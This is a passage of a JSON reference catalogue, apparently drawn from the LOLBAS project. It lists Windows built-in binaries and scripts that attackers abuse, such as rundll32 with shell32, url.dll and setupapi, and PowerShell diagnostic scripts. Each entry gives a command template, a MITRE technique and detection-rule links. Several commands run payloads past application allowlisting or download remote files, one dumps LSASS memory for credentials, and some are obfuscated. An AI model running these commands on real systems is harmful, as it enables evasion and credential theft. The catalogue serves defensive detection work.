location.","mitre":["T1105"],"privilege":"user","fullPath":["c:\\windows\\system32\\scrobj.dll","c:\\windows\\syswow64\\scrobj.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"IOC","value":"Execution of rundll32.exe with 'GenerateTypeLib' and a protocol handler ('://') on the command line"}],"references":["https://twitter.com/eral4m/status/1479106975967240209","https://lolbas-project.github.io/lolbas/Libraries/Scrobj/"]},{"id":"lolbas:setupapi-dll:0","toolId":"lolbas:setupapi-dll","toolName":"Setupapi.dll","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 {PATH_ABSOLUTE:.inf}","description":"Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).","usecase":"Run local or remote script(let) code through INF file specification.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\setupapi.dll","c:\\windows\\syswow64\\setupapi.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_rundll32_setupapi_installhinfsection.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___setupapi.yml"}],"references":["https://github.com/huntresslabs/evading-autoruns","https://twitter.com/pabraeken/status/994742106852941825","https://windows10dll.nirsoft.net/setupapi_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Setupapi/"]},{"id":"lolbas:setupapi-dll:1","toolId":"lolbas:setupapi-dll","toolName":"Setupapi.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 {PATH_ABSOLUTE:.inf}","description":"Launch an executable file via the InstallHinfSection function and .inf file section directive.","usecase":"Load an executable payload.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\setupapi.dll","c:\\windows\\syswow64\\setupapi.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_rundll32_setupapi_installhinfsection.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___setupapi.yml"}],"references":["https://github.com/huntresslabs/evading-autoruns","https://twitter.com/pabraeken/status/994742106852941825","https://windows10dll.nirsoft.net/setupapi_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Setupapi/"]},{"id":"lolbas:shdocvw-dll:0","toolId":"lolbas:shdocvw-dll","toolName":"Shdocvw.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe shdocvw.dll,OpenURL {PATH_ABSOLUTE:.url}","description":"Launch an executable payload via proxy through a URL (information) file by calling OpenURL.","usecase":"Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\shdocvw.dll","c:\\windows\\syswow64\\shdocvw.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"references":["http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/","https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/","https://twitter.com/bohops/status/997690405092290561","https://windows10dll.nirsoft.net/shdocvw_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Shdocvw/"]},{"id":"lolbas:shell32-dll:0","toolId":"lolbas:shell32-dll","toolName":"Shell32.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe shell32.dll,Control_RunDLL {PATH_ABSOLUTE:.dll}","description":"Launch a DLL payload by calling the Control_RunDLL function.","usecase":"Load a DLL payload.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\shell32.dll","c:\\windows\\syswow64\\shell32.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/rundll32_control_rundll_hunt.yml"}],"references":["https://twitter.com/Hexacorn/status/885258886428725250","https://twitter.com/pabraeken/status/991768766898941953","https://twitter.com/mattifestation/status/776574940128485376","https://twitter.com/KyleHanslovan/status/905189665120149506","https://windows10dll.nirsoft.net/shell32_dll.html","https://www.hexacorn.com/blog/2025/05/18/shell32-dll-44-lolbin/","https://lolbas-project.github.io/lolbas/Libraries/Shell32/"]},{"id":"lolbas:shell32-dll:1","toolId":"lolbas:shell32-dll","toolName":"Shell32.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe shell32.dll,ShellExec_RunDLL {PATH:.exe}","description":"Launch an executable by calling the ShellExec_RunDLL function.","usecase":"Run an executable payload.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\shell32.dll","c:\\windows\\syswow64\\shell32.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/rundll32_control_rundll_hunt.yml"}],"references":["https://twitter.com/Hexacorn/status/885258886428725250","https://twitter.com/pabraeken/status/991768766898941953","https://twitter.com/mattifestation/status/776574940128485376","https://twitter.com/KyleHanslovan/status/905189665120149506","https://windows10dll.nirsoft.net/shell32_dll.html","https://www.hexacorn.com/blog/2025/05/18/shell32-dll-44-lolbin/","https://lolbas-project.github.io/lolbas/Libraries/Shell32/"]},{"id":"lolbas:shell32-dll:2","toolId":"lolbas:shell32-dll","toolName":"Shell32.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32 SHELL32.DLL,ShellExec_RunDLL {PATH:.exe} {CMD:args}","description":"Launch command line by calling the ShellExec_RunDLL function.","usecase":"Run an executable payload.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\shell32.dll","c:\\windows\\syswow64\\shell32.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/rundll32_control_rundll_hunt.yml"}],"references":["https://twitter.com/Hexacorn/status/885258886428725250","https://twitter.com/pabraeken/status/991768766898941953","https://twitter.com/mattifestation/status/776574940128485376","https://twitter.com/KyleHanslovan/status/905189665120149506","https://windows10dll.nirsoft.net/shell32_dll.html","https://www.hexacorn.com/blog/2025/05/18/shell32-dll-44-lolbin/","https://lolbas-project.github.io/lolbas/Libraries/Shell32/"]},{"id":"lolbas:shell32-dll:3","toolId":"lolbas:shell32-dll","toolName":"Shell32.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe shell32.dll,#44 {PATH:.dll}","description":"Load a DLL/CPL by calling undocumented Control_RunDLLNoFallback function.","usecase":"Load a DLL/CPL payload.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\shell32.dll","c:\\windows\\syswow64\\shell32.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/rundll32_control_rundll_hunt.yml"}],"references":["https://twitter.com/Hexacorn/status/885258886428725250","https://twitter.com/pabraeken/status/991768766898941953","https://twitter.com/mattifestation/status/776574940128485376","https://twitter.com/KyleHanslovan/status/905189665120149506","https://windows10dll.nirsoft.net/shell32_dll.html","https://www.hexacorn.com/blog/2025/05/18/shell32-dll-44-lolbin/","https://lolbas-project.github.io/lolbas/Libraries/Shell32/"]},{"id":"lolbas:shimgvw-dll:0","toolId":"lolbas:shimgvw-dll","toolName":"Shimgvw.dll","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"rundll32.exe c:\\Windows\\System32\\shimgvw.dll,ImageView_Fullscreen {REMOTEURL:.exe}","description":"Once executed, rundll32.exe will download the file at the URL in the command to INetCache. Can also be used with entrypoint 'ImageView_FullscreenA'.","usecase":"Download file from remote location.","mitre":["T1105"],"privilege":"user","fullPath":["c:\\windows\\system32\\shimgvw.dll","c:\\windows\\syswow64\\shimgvw.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"IOC","value":"Execution of rundll32.exe with 'ImageView_Fullscreen' and a protocol handler ('://') on the command line"}],"references":["https://twitter.com/eral4m/status/1479080793003671557","https://lolbas-project.github.io/lolbas/Libraries/Shimgvw/"]},{"id":"lolbas:syssetup-dll:0","toolId":"lolbas:syssetup-dll","toolName":"Syssetup.dll","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 {PATH_ABSOLUTE:.inf}","description":"Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).","usecase":"Run local or remote script(let) code through INF file specification (Note May pop an error window).","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\syssetup.dll","c:\\windows\\syswow64\\syssetup.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___syssetup.yml"}],"references":["https://twitter.com/pabraeken/status/994392481927258113","https://twitter.com/harr0ey/status/975350238184697857","https://twitter.com/bohops/status/975549525938135040","https://windows10dll.nirsoft.net/syssetup_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Syssetup/"]},{"id":"lolbas:syssetup-dll:1","toolId":"lolbas:syssetup-dll","toolName":"Syssetup.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 {PATH_ABSOLUTE:.inf}","description":"Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive.","usecase":"Load an executable payload.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\syssetup.dll","c:\\windows\\syswow64\\syssetup.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___syssetup.yml"}],"references":["https://twitter.com/pabraeken/status/994392481927258113","https://twitter.com/harr0ey/status/975350238184697857","https://twitter.com/bohops/status/975549525938135040","https://windows10dll.nirsoft.net/syssetup_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Syssetup/"]},{"id":"lolbas:url-dll:0","toolId":"lolbas:url-dll","toolName":"Url.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe url.dll,OpenURL {PATH_ABSOLUTE:.hta}","description":"Launch a HTML application payload by calling OpenURL.","usecase":"Invoke an HTML Application via mshta.exe (Default Handler).","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\url.dll","c:\\windows\\syswow64\\url.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"references":["https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/","https://twitter.com/DissectMalware/status/995348436353470465","https://twitter.com/bohops/status/974043815655956481","https://twitter.com/yeyint_mth/status/997355558070927360","https://twitter.com/Hexacorn/status/974063407321223168","https://windows10dll.nirsoft.net/url_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Url/"]},{"id":"lolbas:url-dll:1","toolId":"lolbas:url-dll","toolName":"Url.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe url.dll,OpenURL {PATH_ABSOLUTE:.url}","description":"Launch an executable payload via proxy through a .url (information) file by calling OpenURL.","usecase":"Load an executable payload by calling a .url file.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\url.dll","c:\\windows\\syswow64\\url.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"references":["https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/","https://twitter.com/DissectMalware/status/995348436353470465","https://twitter.com/bohops/status/974043815655956481","https://twitter.com/yeyint_mth/status/997355558070927360","https://twitter.com/Hexacorn/status/974063407321223168","https://windows10dll.nirsoft.net/url_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Url/"]},{"id":"lolbas:url-dll:2","toolId":"lolbas:url-dll","toolName":"Url.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e","description":"Launch an executable by calling OpenURL.","usecase":"Load an executable payload by specifying the file protocol handler (obfuscated).","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\url.dll","c:\\windows\\syswow64\\url.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"references":["https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/","https://twitter.com/DissectMalware/status/995348436353470465","https://twitter.com/bohops/status/974043815655956481","https://twitter.com/yeyint_mth/status/997355558070927360","https://twitter.com/Hexacorn/status/974063407321223168","https://windows10dll.nirsoft.net/url_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Url/"]},{"id":"lolbas:url-dll:3","toolId":"lolbas:url-dll","toolName":"Url.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe url.dll,FileProtocolHandler {PATH_ABSOLUTE:.exe}","description":"Launch an executable by calling FileProtocolHandler.","usecase":"Launch an executable.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\url.dll","c:\\windows\\syswow64\\url.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"references":["https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/","https://twitter.com/DissectMalware/status/995348436353470465","https://twitter.com/bohops/status/974043815655956481","https://twitter.com/yeyint_mth/status/997355558070927360","https://twitter.com/Hexacorn/status/974063407321223168","https://windows10dll.nirsoft.net/url_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Url/"]},{"id":"lolbas:url-dll:4","toolId":"lolbas:url-dll","toolName":"Url.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e","description":"Launch an executable by calling FileProtocolHandler.","usecase":"Load an executable payload by specifying the file protocol handler (obfuscated).","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\url.dll","c:\\windows\\syswow64\\url.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"references":["https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/","https://twitter.com/DissectMalware/status/995348436353470465","https://twitter.com/bohops/status/974043815655956481","https://twitter.com/yeyint_mth/status/997355558070927360","https://twitter.com/Hexacorn/status/974063407321223168","https://windows10dll.nirsoft.net/url_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Url/"]},{"id":"lolbas:url-dll:5","toolId":"lolbas:url-dll","toolName":"Url.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta","description":"Launch a HTML application payload by calling FileProtocolHandler.","usecase":"Invoke an HTML Application via mshta.exe (Default Handler).","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\url.dll","c:\\windows\\syswow64\\url.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"references":["https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/","https://twitter.com/DissectMalware/status/995348436353470465","https://twitter.com/bohops/status/974043815655956481","https://twitter.com/yeyint_mth/status/997355558070927360","https://twitter.com/Hexacorn/status/974063407321223168","https://windows10dll.nirsoft.net/url_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Url/"]},{"id":"lolbas:zipfldr-dll:0","toolId":"lolbas:zipfldr-dll","toolName":"Zipfldr.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe zipfldr.dll,RouteTheCall {PATH:.exe}","description":"Launch an executable payload by calling RouteTheCall.","usecase":"Launch an executable.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\zipfldr.dll","c:\\windows\\syswow64\\zipfldr.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"references":["https://twitter.com/moriarty_meng/status/977848311603380224","https://twitter.com/bohops/status/997896811904929792","https://windows10dll.nirsoft.net/zipfldr_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Zipfldr/"]},{"id":"lolbas:zipfldr-dll:1","toolId":"lolbas:zipfldr-dll","toolName":"Zipfldr.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e","description":"Launch an executable payload by calling RouteTheCall (obfuscated).","usecase":"Launch an executable.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\zipfldr.dll","c:\\windows\\syswow64\\zipfldr.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"references":["https://twitter.com/moriarty_meng/status/977848311603380224","https://twitter.com/bohops/status/997896811904929792","https://windows10dll.nirsoft.net/zipfldr_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Zipfldr/"]},{"id":"lolbas:comsvcs-dll:0","toolId":"lolbas:comsvcs-dll","toolName":"Comsvcs.dll","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"rundll32 C:\\windows\\system32\\comsvcs.dll MiniDump {LSASS_PID} dump.bin full","description":"Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump.","usecase":"Dump Lsass.exe process memory to retrieve credentials.","mitre":["T1003.001"],"privilege":"system","fullPath":["c:\\windows\\system32\\comsvcs.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_rundll32_process_dump_via_comsvcs.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/dump_lsass_via_comsvcs_dll.yml"}],"references":["https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/","https://lolbas-project.github.io/lolbas/Libraries/Comsvcs/"]},{"id":"lolbas:cl-loadassembly-ps1:0","toolId":"lolbas:cl-loadassembly-ps1","toolName":"CL_LoadAssembly.ps1","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"powershell.exe -ep bypass -command \"set-location -path C:\\Windows\\diagnostics\\system\\Audio; import-module .\\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\\..\\..\\..\\testing\\fun.dll;[Program]::Fun()\"","description":"Proxy execute Managed DLL with PowerShell","usecase":"Execute proxied payload with Microsoft signed binary","mitre":["T1216"],"privilege":"user","fullPath":["C:\\Windows\\diagnostics\\system\\Audio\\CL_LoadAssembly.ps1"],"toolType":"Script","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/ff6c54ded6b52f379cec11fe17c1ccb956faa660/rules/windows/process_creation/proc_creation_win_lolbas_cl_loadassembly.yml"}],"references":["https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/","https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/"]},{"id":"lolbas:cl-mutexverifiers-ps1:0","toolId":"lolbas:cl-mutexverifiers-ps1","toolName":"CL_Mutexverifiers.ps1","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":". C:\\Windows\\diagnostics\\system\\AERO\\CL_Mutexverifiers.ps1 \\nrunAfterCancelProcess {PATH:.ps1}","description":"Import the PowerShell Diagnostic CL_Mutexverifiers script and call runAfterCancelProcess to launch an executable.","usecase":"Proxy execution","mitre":["T1216"],"privilege":"user","fullPath":["C:\\Windows\\diagnostics\\system\\WindowsUpdate\\CL_Mutexverifiers.ps1","C:\\Windows\\diagnostics\\system\\Audio\\CL_Mutexverifiers.ps1","C:\\Windows\\diagnostics\\system\\WindowsUpdate\\CL_Mutexverifiers.ps1","C:\\Windows\\diagnostics\\system\\Video\\CL_Mutexverifiers.ps1","C:\\Windows\\diagnostics\\system\\Speech\\CL_Mutexverifiers.ps1"],"toolType":"Script","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_cl_mutexverifiers.yml"}],"references":["https://twitter.com/pabraeken/status/995111125447577600","https://lolbas-project.github.io/lolbas/Scripts/CL_Mutexverifiers/"]},{"id":"lolbas:cl-invocation-ps1:0","toolId":"lolbas:cl-invocation-ps1","toolName":"CL_Invocation.ps1","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":". C:\\Windows\\diagnostics\\system\\AERO\\CL_Invocation.ps1 \\nSyncInvoke {CMD}","description":"Import the PowerShell Diagnostic CL_Invocation script and call SyncInvoke to launch an executable.","usecase":"Proxy execution","mitre":["T1216"],"privilege":"user","fullPath":["C:\\Windows\\diagnostics\\system\\AERO\\CL_Invocation.ps1","C:\\Windows\\diagnostics\\system\\Audio\\CL_Invocation.ps1","C:\\Windows\\diagnostics\\system\\WindowsUpdate\\CL_Invocation.ps1"],"toolType":"Script","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_cl_invocation.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/powershell/powershell_script/posh_ps_cl_invocation_lolscript.yml"}],"references":["https://lolbas-project.github.io/lolbas/Scripts/CL_Invocation/"]},{"id":"lolbas:launch-vsdevshell-ps1:0","toolId":"lolbas:launch-vsdevshell-ps1","toolName":"Launch-VsDevShell.ps1","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"powershell -ep RemoteSigned -f .\\Launch-VsDevShell.ps1 -VsWherePath {PATH_ABSOLUTE:.exe}","description":"Execute binaries from the context of the signed script using the \"VsWherePath\" flag.","usecase":"Proxy execution","mitre":["T1216"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\Tools\\Launch-VsDevShell.ps1","C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\Tools\\Launch-VsDevShell.ps1"],"toolType":"Script","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml"}],"references":["https://twitter.com/nas_bench/status/1535981653239255040","https://lolbas-project.github.io/lolbas/Scripts/Launch-VsDevShell/"]},{"id":"lolbas:launch-vsdevshell-ps1:1","toolId":"lolbas:launch-vsdevshell-ps1","toolName":"Launch-VsDevShell.ps1","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"powershell -ep RemoteSigned -f .\\Launch-VsDevShell.ps1 -VsInstallationPath \"/../../../../../; {PATH:.exe} ;\"","description":"Execute binaries and commands from the context of the signed script using the \"VsInstallationPath\" flag.","usecase":"Proxy execution","mitre":["T1216"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\Tools\\Launch-VsDevShell.ps1","C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\Tools\\Launch-VsDevShell.ps1"],"toolType":"Script","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml"}],"references":["https://twitter.com/nas_bench/status/1535981653239255040","https://lolbas-project.github.io/lolbas/Scripts/Launch-VsDevShell/"]},{"id":"lolbas:manage-bde-wsf:0","toolId":"lolbas:manage-bde-wsf","toolName":"Manage-bde.wsf","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"set 